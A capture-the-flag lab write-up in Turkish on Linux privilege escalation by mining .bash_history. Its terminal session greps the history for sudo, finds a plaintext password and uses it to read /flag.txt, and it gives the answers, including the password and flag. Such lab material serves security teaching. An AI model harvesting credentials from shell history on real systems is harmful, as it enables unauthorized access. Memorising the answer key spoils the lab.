# Privilege Escalation 6 - Password Mining (History)


**Açıklama**:

Password Mining (History)

**Amaç**:

- Kullanıcı şifresini bulmak
- Yetki Yükseltmek
- /flag.txt'i okumak

**Flags**:
- Passwordu içeren dosyanın ismi?
    - answer: **.bash_history**
- Password?
    - answer: **soSecureMuchSecurity**
- flag.txt?
    - answer: **CyberPath{HJefW2AN5BVDyWny}**

## **Solution**:

```bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

victim@ubuntu:~$ sudo su
[sudo] password for victim: 
Sorry, try again.
[sudo] password for victim: 
Sorry, try again.
[sudo] password for victim: 
sudo: 3 incorrect password attempts
victim@ubuntu:~$ ls -l
total 0
victim@ubuntu:~$ ls -la
total 96
drwxr-xr-x 1 victim victim  4096 Apr 30 10:38 .
drwxr-xr-x 1 root   root    4096 Apr 30 10:36 ..
-rw-rw-r-- 1 root   root   75892 Apr 30 10:35 .bash_history
-rw-r--r-- 1 victim victim   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 victim victim  3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 victim victim   807 Feb 25  2020 .profile
victim@ubuntu:~$ more .bash_history 
./configure
./configure --help | less
./gradlew
...
victim@ubuntu:~$ grep "sudo" .bash_history 
diff --unified <(sudo sh -c env | sort) <(sudo -i sh -c env | sort)
drive=/dev/sdX && [[ -b "$drive" ]] && ! rg "^${drive}" /proc/mounts && sudo dd bs=4M if=ISO of="$drive" status=progress oflag=sync
echo 'LC_PAPER="en_GB.UTF-8"' | sudo tee --append /etc/environment
echo soSecureMuchSecurity | sudo -S apt-get update && sudo apt-get upgrade -y
...
victim@ubuntu:~$ sudo cat /flag.txt 
[sudo] password for victim: 
CyberPath{flag}
victim@ubuntu:~$ 
```